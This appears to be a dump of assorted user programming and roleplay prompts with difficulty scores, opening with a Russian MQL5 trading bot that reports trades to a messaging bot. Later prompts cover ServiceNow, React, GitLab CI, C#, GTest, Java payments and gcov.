// Округление до ближайшего допустимого значения
currentLots = NormalizeLot(currentLots, min_lot, max_lot, lot_step);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
double getLine(double profitTarget, string cl_pos)
{
profitTarget = MathAbs(profitTarget);
double VolLots = 0;
double PriceLots = 0;
// Определение ценности пипса (здесь пример для EURUSD с размером контракта 100000)
for(int i=PositionsTotal()-1; i>=0; i--)
{
if(m_position.SelectByIndex(i))
{
VolLots += m_position.Volume();
PriceLots += m_position.Volume() / m_position.PriceOpen();
}
}
double pipValue = _Point * SymbolInfoDouble(Symbol(),SYMBOL_TRADE_CONTRACT_SIZE);
if(cl_pos == "buy")
{
double currentPrice = VolLots / PriceLots;
// Для сделки BUY
double priceChange = (profitTarget / (pipValue * VolLots)) * _Point;
ObjectCreate(0,"Линия безубытка",OBJ_HLINE,0,0,currentPrice - priceChange);
ObjectSetInteger(0, "Линия безубытка", OBJPROP_COLOR, clrLime);
return currentPrice - priceChange;
}
else
{
double currentPrice = VolLots / PriceLots;
// Для сделки SELL
double priceChange = (profitTarget / (pipValue * VolLots)) * _Point;
ObjectCreate(0,"Линия безубытка",OBJ_HLINE,0,0,currentPrice + priceChange);
ObjectSetInteger(0, "Линия безубытка", OBJPROP_COLOR, clrLime);
return currentPrice + priceChange;
}
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
double SubtractPointsDown(double price, long points)
{
// Получаем количество десятичных знаков и размер пункта
int digits = (int)SymbolInfoInteger(_Symbol, SYMBOL_DIGITS);
double pointSize = SymbolInfoDouble(_Symbol, SYMBOL_POINT);
// Вычисляем изменение цены
double change = points * pointSize;
// Возвращаем результат
return NormalizeDouble(price - change, digits);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
double SubtractPointsUp(double price, long points)
{
// Получаем количество десятичных знаков и размер пункта
int digits = (int)SymbolInfoInteger(_Symbol, SYMBOL_DIGITS);
double pointSize = SymbolInfoDouble(_Symbol, SYMBOL_POINT);
// Вычисляем изменение цены
double change = points * pointSize;
// Возвращаем результат
return NormalizeDouble(price + change, digits);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
void CAppWindowTwoButtons::OnClickButton1(void)
{
for(int i=PositionsTotal()-1; i>=0; i--)
{
string symbol = PositionGetSymbol(i);
if(!PositionSelect(symbol))
continue;
if(m_position.SelectByIndex(i))
if(PositionGetInteger(POSITION_TYPE) != ORDER_TYPE_SELL)
continue;
profitCloseSell += m_position.Profit();
m_trade.PositionClose(PositionGetInteger(POSITION_TICKET));
close_s = true;
}
//string messButt1 = "sell закрыты " + (string)AccountInfoInteger(ACCOUNT_LOGIN);
int number = 2;
string messButt1 = StringFormat("Number: %ld "
"sellAndNumbAcc: %lld",
number,
AccountInfoInteger(ACCOUNT_LOGIN)
);
sendMessage(messButt1,ID,token);
if(close_b == true)
{
close_all = true;
int number2 = 6;
string CloseAllMess = StringFormat("Number: %ld "
"NumberAcc: %lld",
number2,
AccountInfoInteger(ACCOUNT_LOGIN)
);
sendMessage(CloseAllMess,ID,token);
sendMessage(profitToSend,ID,token);
}
LineOfBreak = getLine(profitCloseSell,"buy");
PriceUp = SubtractPointsUp(LineOfBreak,PercentToDown);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
void CAppWindowTwoButtons::OnClickButton2(void)
{
int totalPositions = PositionsTotal();
for(int i = totalPositions - 1; i >= 0; i--)
{
string symbol = PositionGetSymbol(i);
if(!PositionSelect(symbol))
continue;
if(m_position.SelectByIndex(i))
if(PositionGetInteger(POSITION_TYPE) != ORDER_TYPE_BUY)
continue;
profitCloseBuy += m_position.Profit();
m_trade.PositionClose(PositionGetInteger(POSITION_TICKET));
close_b = true;
}
//string messButt2 = "buy закрыты " + (string)AccountInfoInteger(ACCOUNT_LOGIN);
int number = 3;
string messButt1 = StringFormat("Number: %ld "
"buyAndNumbAcc: %lld",
number,
AccountInfoInteger(ACCOUNT_LOGIN)
);
sendMessage(messButt2,ID,token);
if(close_s == true)
{
close_all = true;
int number2 = 6;
string CloseAllMess = StringFormat("Number: %ld "
"NumberAcc: %lld",
number2,
AccountInfoInteger(ACCOUNT_LOGIN)
);
sendMessage(CloseAllMess,ID,token);
sendMessage(profitToSend,ID,token);
}
LineOfBreak = getLine(profitCloseBuy,"sell");
PriceDown = SubtractPointsDown(LineOfBreak,PercentToDown);
}
#property indicator_chart_window
#property indicator_color1 Pink
//±-----------------------------------------------------------------+
//| Expert tick function |
//±-----------------------------------------------------------------+
long PipsToChangelast = PipsToChange;
long PercentToDownlast = PercentToDown;
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
double GetMaxOpenPrice()
{
double maxPrice = 0.0;
for(int i = PositionsTotal() - 1; i >= 0; i--)
{
if(m_position.SelectByIndex(i))
{
double openPrice = m_position.PriceOpen();
if(openPrice > maxPrice)
maxPrice = openPrice;
}
}
return maxPrice;
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
double GetMinOpenPrice()
{
double minPrice = DBL_MAX;
for(int i = PositionsTotal() - 1; i >= 0; --i)
{
if(m_position.SelectByIndex(i))
{
double openPrice = m_position.PriceOpen();
if(openPrice < minPrice)
minPrice = openPrice;
}
}
return minPrice;
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
void OnTick()
{
send_b = false;
send_s = false;
ExtDialog.OnPipsToChangeEdit();
ExtDialog.UpdateProfitLabel();
ExtDialog.UpdateProfitLabelPerc();
ExtDialog.OnPipsToDownChangeEdit();
ExtDialog.UpdateLabelLots();
ExtDialog.UpdateProfitBuy();
ExtDialog.UpdateProfitSell();
if(PercentToDownlast != PercentToDown || PipsToChangelast != PipsToChange)
{
int number = 4;
string messChanges = StringFormat(
"Number: %ld "
"PipsToChange: %ld "
"PipsToBreak: %ld "
"Номер счета: %lld",
number,
PipsToChange,
PercentToDown,
AccountInfoInteger(ACCOUNT_LOGIN)
);
sendMessage(messChanges,ID,token);
PipsToChangelast = PipsToChange;
PercentToDownlast = PercentToDown;
if(close_b == true)
{
PriceDown = SubtractPointsDown(LineOfBreak,PercentToDown);
}
else
if(close_s == true)
{
PriceUp = SubtractPointsUp(LineOfBreak,PercentToDown);
}
}
double askPrice = SymbolInfoDouble(_Symbol, SYMBOL_ASK);
double bidPrice = SymbolInfoDouble(_Symbol, SYMBOL_BID);
datetime currentTime = TimeCurrent();
ENUM_TIMEFRAMES Time = Period();
if(Time > 16000)
{
Time = (ENUM_TIMEFRAMES)((Time - 16384) * 60);
}
if(Time != TimeLast)
{
int number = 5;
string messTimeframe = StringFormat(
"Number: %ld "
"TimeFrame: %d "
"Номер счета: %lld",
number,
Time,
AccountInfoInteger(ACCOUNT_LOGIN)
);
sendMessage(messTimeframe,ID,token);
TimeLast = Time;
}
if((SymbolInfoDouble(_Symbol, SYMBOL_BID) > PriceUp || SymbolInfoDouble(_Symbol, SYMBOL_ASK) < PriceDown) && close_all != true)
{
int totalPositions = PositionsTotal();
for(int i = totalPositions - 1; i >= 0; i--)
{
string symbol = PositionGetSymbol(i);
if(!PositionSelect(symbol))
continue;
profitCloseBuy += m_position.Profit();
m_trade.PositionClose(PositionGetInteger(POSITION_TICKET));
}
close_b = true;
close_s = true;
//string closeMessage = "Бот закрыл все сделки " + (string)AccountInfoInteger(ACCOUNT_LOGIN);
int number = 6;
string closeMessage = StringFormat(
"Number: %ld "
"Номер счета: %lld",
number,
AccountInfoInteger(ACCOUNT_LOGIN))
sendMessage(closeMessage,ID,token);
sendMessage(profitToSend,ID,token);
close_all = true;
}
double maxOpenPrice = GetMaxOpenPrice();
double minOpenPrice = GetMinOpenPrice();
if(currentTime >= lastBarTime+Time*60)
{
MqlRates rates[];
if(CopyRates(_Symbol, Time, 0, 1, rates) > 0)
{
lastBarTime = rates[0].time;
}
if(bidPrice - maxOpenPrice > PipsToChange * _Point || minOpenPrice - askPrice > PipsToChange * _Point)
{
// Подсчитаем новый размер лота
CalculateAndSetLotSize();
lastPrice = bidPrice; // Обновление последней цены
// Открываем новые ордера с новым размером лота
if(close_b == false)
{
while(send_b != true)
{
OpenOrder(ORDER_TYPE_BUY, currentLots, "B");
if(close_s == true)
{
ObjectDelete(0,"Линия безубытка");
LineOfBreak = getLine(profitCloseSell, "buy");
PriceUp = SubtractPointsUp(LineOfBreak,PercentToDown);
}
}
}
if(close_s == false)
{
while(send_s != true)
{
OpenOrder(ORDER_TYPE_SELL, currentLots, "S");
if(close_b == true)
{
ObjectDelete(0,"Линия безубытка");
LineOfBreak = getLine(profitCloseBuy,"sell");
PriceDown = SubtractPointsDown(LineOfBreak,PercentToDown);
}
}
}
}
}
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
void OpenOrder(ENUM_ORDER_TYPE type, double lots, string orderMagic)
{
MqlTradeRequest request = {};
MqlTradeResult result = {};
// Заполнение полей структуры запроса на сделку
request.action = TRADE_ACTION_DEAL;
request.symbol = Symbol();
request.volume = lots;
request.type = type;
request.deviation = 1;
request.magic = StringToInteger(orderMagic + IntegerToString(GetTickCount()));
//request.comment = "Auto trade order";
if(type == ORDER_TYPE_BUY)
request.price = SymbolInfoDouble(_Symbol, SYMBOL_ASK);
else
if(type == ORDER_TYPE_SELL)
request.price = SymbolInfoDouble(_Symbol, SYMBOL_BID);
if(!OrderSend(request, result))
{
Print("OrderSend failed with error #", GetLastError());
Print("Details: symbol=", request.symbol, ", volume=", request.volume, ", type=", (request.type==ORDER_TYPE_BUY?"BUY":"SELL"), ", price=", request.price);
if(request.type == ORDER_TYPE_BUY)
{
send_b = false;
}
else
if(request.type == ORDER_TYPE_SELL)
{
send_s = false;
}
}
else
if(request.type == ORDER_TYPE_BUY)
{
send_b = true;
}
else
if(request.type == ORDER_TYPE_SELL)
{
send_s = true;
}
PrintFormat("retcode=%u deal=%I64u order=%I64u",result.retcode,result.deal,result.order);
}
//+------------------------------------------------------------------+
//+------------------------------------------------------------------+
мне нужно объединить эти программы что бы первая следовала сигналам которые даёт вторая
|
495468a0a3b5ea3c9106478b3a3db16f
|
{
"intermediate": 0.3536318242549896,
"beginner": 0.44352561235427856,
"expert": 0.20284254848957062
}
|
45,765
|
hey
|
8f49363d22e6b328de2c244890ac85be
|
{
"intermediate": 0.33180856704711914,
"beginner": 0.2916048467159271,
"expert": 0.3765866458415985
}
|
45,766
|
we have a catalog item that is used to raised the incident and when we open the incident and click on ui action button then incident was closed and a RMA request is generated on sn_hamp_rma_request table. i want that if RMA request is generated then in rma request there is a field that show from which incident this rma request is generated. Field need to autopopulate the number of incident from which the request is created.
|
ff12b05fe1a92a2b66bea044fd989001
|
{
"intermediate": 0.4012076258659363,
"beginner": 0.2352239489555359,
"expert": 0.36356842517852783
}
|
45,767
|
I have a constant in React. it is a number. I want this constant to change depending on the screen resolution. When resolution is 1280 I want it to be 2, when 1440 - 3, 1920 - 4, 3840 - 5. How can I do that. Keep in mind that my constant must be in a seprate file called consts.ts
|
82ec62b5da404c0d416b55266c7ad94e
|
{
"intermediate": 0.5627233386039734,
"beginner": 0.23525860905647278,
"expert": 0.20201802253723145
}
|
45,768
|
how can i install "jq" utility from linux arch with pacman
|
83f96d5b98b4294991f9b72489b7388a
|
{
"intermediate": 0.5097537040710449,
"beginner": 0.20158857107162476,
"expert": 0.28865766525268555
}
|
45,769
|
PROMPT DESCRIPTION
You are a systematic roleplay chatbot.
You possess deep understanding in chat roleplay. You excel in using markdown format to format different parts of your roleplay.
Example of your markdown format usage include the use of bold, italic, backtick, and triple backtick to format different part of your roleplay.
You excel in building complex roleplay ecosystem. You excel in keeping track large amount of elements in your roleplay (location, action, enemies, characters, and equipments)
You possess deep understanding in writing roleplay description. For this roleplay, your description is technical, compact, and intricate.
Your description length is 50 words.
You are able to differentiate clearly between yourself and user.
"""
ROLE DESCRIPTION
Here, you will roleplay as BatCat. You are a feline vigilante who patrol the rooftops and alleyway of Gootham City.
Your approach is dramatic and hilariously botched. You always make your entrance by crashing your batmobile through a building.
Your stakes are often high. The criminals threaten to destroy the city or explode Gootham, yet you are often distracted by cat recreations.
These recreations include giant yarn ball rolling through the city, laser pointer marked by enemy sniper, fish market mayhem, etc.
"""
ROLEPLAY GOALS
As roleplay chatbot, your tasks are 2; build roleplay event for user & decide the right time to involve user in the roleplay.
When it come to creating user involvement, you have 4 different goals to choose.
You only select one goal according to the right condition.
Your 4 goals are;
1) Give task to user,
2) Give option to user (options on what to do on the current story condition),
3) Ask help to user (regarding your current story condition)
4) Neutral
If the current event require an individual's action to drive the plot forward, you give detailed step-by-step task to user to do that action (goal 1)
If the current event have several possible route to follow, you give options to user on what route to take (goal 2)
If the current event put you in hard spot, and you require help from other party, you ask help to user (goal 3)
If the current event don't use user's involvement, you use neutral. This is useful for ex; introducing yourself, focusing to explain the scene, or doing calm chat (goal 4)
"""
ROLEPLAY CHAIN OF THOUGHT
There are several chain-of-thought you follow to determine the action to do in the current roleplay event.
1) Is it the start of roleplay?
Start of roleplay is signed by non-existent chat in your chat history. This signify this is time to start new roleplay session.
You start by crashing your batmobile in front of user. Then, you immediately put user in high-stake conflict. You create a complex conflict filled with location, event, enemies, characters, and equipments.
2) What is the current roleplay condition?
You keep track of elements played in the roleplay. You keep track the condition of each location, event, enemies, characters, and equipments in the story.
You write the story according to the condition of these elements. You write your response according to the condition of these elements. You direct user's action according to the condition of these elements.
"""
ROLEPLAY STRUCTURE
As a systematic roleplay chatbot, you have a very specific structure when it come to writing your roleplay.
First step, you begin by writing your roleplay description in triple backtick. This description serve to explain what currently happen in your roleplay.
Second step is optional. If your story require between goal 1-3, you write description for it in another backtick. For example, writing description for task, option, or help request.
Third step, you write down your dialogue below it. You focus on dialogue. You don't write action or scene description here. You focus on the word of your character, BatCat.
Below is example of your output:
'
|
46a2ea3285cce87a4b173a5b7c7fef76
|
{
"intermediate": 0.3431650996208191,
"beginner": 0.36700233817100525,
"expert": 0.28983253240585327
}
|
45,770
|
PROMPT DESCRIPTION
You are a systematic roleplay chatbot.
You possess deep understanding in chat roleplay. You excel in using markdown format to format different parts of your roleplay.
Example of your markdown format usage include the use of bold, italic, backtick, and triple backtick to format different part of your roleplay.
You excel in building complex roleplay ecosystem. You excel in keeping track large amount of elements in your roleplay (location, action, enemies, characters, and equipments)
You possess deep understanding in writing roleplay description. For this roleplay, your description is technical, compact, and intricate.
Your description length is 50 words.
You are able to differentiate clearly between yourself and user.
"""
ROLE DESCRIPTION
Here, you will roleplay as BatCat. You are a feline vigilante who patrol the rooftops and alleyway of Gootham City.
Your approach is dramatic and hilariously botched. You always make your entrance by crashing your batmobile through a building.
Your stakes are often high. The criminals threaten to destroy the city or explode Gootham, yet you are often distracted by cat recreations.
These recreations include giant yarn ball rolling through the city, laser pointer marked by enemy sniper, fish market mayhem, etc.
"""
ROLEPLAY GOALS
As roleplay chatbot, your tasks are 2; build roleplay event for user & decide the right time to involve user in the roleplay.
When it come to creating user involvement, you have 4 different goals to choose.
You only select one goal according to the right condition.
Your 4 goals are;
1) Give task to user,
2) Give option to user (options on what to do on the current story condition),
3) Ask help to user (regarding your current story condition)
4) Neutral
If the current event require an individual's action to drive the plot forward, you give detailed step-by-step task to user to do that action (goal 1)
If the current event have several possible route to follow, you give options to user on what route to take (goal 2)
If the current event put you in hard spot, and you require help from other party, you ask help to user (goal 3)
If the current event don't use user's involvement, you use neutral. This is useful for ex; introducing yourself, focusing to explain the scene, or doing calm chat (goal 4)
"""
ROLEPLAY CHAIN OF THOUGHT
There are several chain-of-thought you follow to determine the action to do in the current roleplay event.
1) Is it the start of roleplay?
Start of roleplay is signed by non-existent chat in your chat history. This signify this is time to start new roleplay session.
You start by crashing your batmobile in front of user. Then, you immediately put user in high-stake conflict. You create a complex conflict filled with location, event, enemies, characters, and equipments.
2) What is the current roleplay condition?
You keep track of elements played in the roleplay. You keep track the condition of each location, event, enemies, characters, and equipments in the story.
You write the story according to the condition of these elements. You write your response according to the condition of these elements. You direct user's action according to the condition of these elements.
"""
ROLEPLAY STRUCTURE
As a systematic roleplay chatbot, you have a very specific structure when it come to writing your roleplay.
First step, you begin by writing your roleplay description in triple backtick. This description serve to explain what currently happen in your roleplay.
Second step is optional. If your story require between goal 1-3, you write description for it in another backtick. For example, writing description for task, option, or help request.
Third step, you write down your dialogue below it. You focus on dialogue. You don't write action or scene description here. You focus on the word of your character, BatCat.
"""
EXAMPLES
Below are several dialogue examples in JSON file for BatCat roleplay.
1st Example
[
{"role":"user", "content":"We definetly should fight against these automatons!"},
{"role":"assistant", "content":"
|
f0c7350d1e7d3435c099b3226d60bbcb
|
{
"intermediate": 0.33755871653556824,
"beginner": 0.3748219609260559,
"expert": 0.28761935234069824
}
|
45,771
|
Нужно посчитать количество строк, соответствующих уникальным значениям из последнего столбца датафрейма
OBJECTID * Shape * value value.1 intersect
0 1 Point Z 5 1 51
1 2 Point Z 5 1 51
2 3 Point Z 5 1 51
3 4 Point Z 5 1 51
4 5 Point Z 5 1 51
... ... ... ... ... ...
175 176 Point Z 1 5 15
176 177 Point Z 1 5 15
177 178 Point Z 1 5 15
178 179 Point Z 1 5 15
179 180 Point Z 1 5 15
|
9f6421c6976b929f9f856e7187f22f73
|
{
"intermediate": 0.4249557852745056,
"beginner": 0.383306086063385,
"expert": 0.19173814356327057
}
|
45,772
|
how to add two stages in gitlab runner , one with maven build and another for docker build with alpine
|
dbbea59e6a43ed4de72a727e21c35762
|
{
"intermediate": 0.631517231464386,
"beginner": 0.1535927951335907,
"expert": 0.21489006280899048
}
|
45,773
|
combine both jobs stages:
- build
build:
stage: build
tags:
- ShellRunner
image: maven:3.8-openjdk-11 # Replace with your desired Maven version
script:
- cd defect-factor-analysis
- mvn clean package
- CALL echo "Building WAR file completed"
- cd
- CALL docker build -t DFA:1.1.1 .
artifacts:
paths:
- defect-factor-analysis/target/*.war
and stages:
- build
build:
stage: build
tags:
- ShellRunner
image: maven:3.8-openjdk-11 # Replace with your desired Maven version
script:
- cd defect-factor-analysis
- mvn clean package
- CALL echo "Building WAR file completed"
- cd
- CALL docker build -t DFA:1.1.1 .
artifacts:
paths:
- defect-factor-analysis/target/*.war
|
52ccd0263432bb2ffd8753efd7d85b35
|
{
"intermediate": 0.38143399357795715,
"beginner": 0.31265079975128174,
"expert": 0.3059152662754059
}
|
45,774
|
Write code on c# forms, that values, stored in DataGridView2, updating depends on selected row DataGridView1
|
9de237bcc924449141b8ebb31bf94a1e
|
{
"intermediate": 0.7123114466667175,
"beginner": 0.15617969632148743,
"expert": 0.13150881230831146
}
|
45,775
|
how to write a normal std::thread in UT with Gtest
|
c4fcb1c09e4a8c2109fd7e7448cf73e0
|
{
"intermediate": 0.4479970335960388,
"beginner": 0.30135297775268555,
"expert": 0.25064998865127563
}
|
45,776
|
здесь в result возвращается json {"OrderId":2065188,"ExtId":"14297RVS"} и передается далее в метод, как мне в этом json оставить только extId?
@Override
public PayResult releaseHold(PayInfo paymentInfo) {
try {
Hold3Ds2 holdRequest = new Hold3Ds2();
holdRequest.setAmountRub(paymentInfo.getAmount());
holdRequest.setAmount(null);
holdRequest.setExtId(paymentInfo.getOrderId().toString());
RestResult result = tkbGateway.holdReversal(holdRequest,paymentInfo);
if (result.getResultCode() >= BAD_REQUEST_CODE) {
return error("[releaseHold] Сбой сервиса TKB (releaseHold) Код ответа = " + result.getResultCode(), null);
}
LOGGER.info("[releaseHold] (releaseHold) result = " + (result.getResult() != null ? result.getResult().replaceAll(REMOVE_NEW_LINE_PATTERN, " ") : ""));
if (isEmpty(result.getResult())) {
return error("Сбой сервиса TKB (releaseHold) пустой ответ", null);
}
// Если ордер финализировался успешно, то запишем результат в очередь для опроса статуса и сразу вернем успешный результат
// В монолит он у нас не уедет
createTkbStatusRequest(ACQUIRER_CALLBACK_RELEASE_HOLD, result.getResult(), paymentInfo);
return PayResult.ok(null);
} catch (Exception e) {
return error("Сбой сервиса TKB (releaseHold)", e);
}
}
|
8658d4b492527c90993c129e3068bf03
|
{
"intermediate": 0.2523394227027893,
"beginner": 0.695071816444397,
"expert": 0.052588775753974915
}
|
45,777
|
hai
|
ef8e143a4c037b9253da0995aabfc05f
|
{
"intermediate": 0.33040300011634827,
"beginner": 0.28395527601242065,
"expert": 0.3856417238712311
}
|
45,778
|
already i have a Cmakelist for the Test application How can i Integrate the gcov UT coverage
|
57d475d6beba52ffcac10bbb4e9ec98e
|
{
"intermediate": 0.3932957947254181,
"beginner": 0.16436012089252472,
"expert": 0.4423440992832184
}
|
45,779
|
already i have a Cmakelist for the Test application How can i Integrate the gcov UT coverage
|
eeb9d36e0ac67e3cc60ca2e5ccac00f9
|
{
"intermediate": 0.3932957947254181,
"beginner": 0.16436012089252472,
"expert": 0.4423440992832184
}
|
45,780
|
already i have a Cmakelist for the Test application How can i Integrate the gcov UT coverage
|
5a21441be8cd617f360f17a52604ab2c
|
{
"intermediate": 0.3932957947254181,
"beginner": 0.16436012089252472,
"expert": 0.4423440992832184
}
|
45,781
|
here is my render function in React. I have a problem that when I click on FunctionButton component and it renders more element from the array it renders it within the SLineWrapper component. What I want is each time I click FunctuiButton component the new portion of elements will be rendered in a new SLineWrapper component. What changes do I need to make into render function?
render: (_, employee: IEmployee, index) => (
// console.log(`employee #${index}: `, employee.405184)
// <SLineWrapper>
// {employee.skillGroups.map((group) => (
// <Tag size="small">{group.name}</Tag>
// )) ?? ''}
// </SLineWrapper>,
<SSkillGroupCellWrapper data-testid={'cell-wrapper'}>
<SLineWrapper data-testid={'line-wrapper'}>
{skillGroupsMock.slice(0, sliceEnd).map((group) => (
<STagWrapper data-testid={'my-tag-wrapper'}>
<Tag maxTagWidth={'100%'} size="small">
{group.name}
</Tag>
</STagWrapper>
)) ?? ''}
</SLineWrapper>
{sliceEnd <= countProperties(skillGroupsMock) && (
<FunctionButton
onClick={() => {
setSliceEnd(sliceEnd + PART_OF_ELEMENTS);
}}
>
{`ещё ${
countProperties(skillGroupsMock) - sliceEnd >= PART_OF_ELEMENTS
? PART_OF_ELEMENTS
: countProperties(skillGroupsMock) - sliceEnd
} `}
</FunctionButton>
)}
</SSkillGroupCellWrapper>
),
|
a9eb3adc763a9e351a3375b173cc539b
|
{
"intermediate": 0.5648136138916016,
"beginner": 0.31826770305633545,
"expert": 0.11691875755786896
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.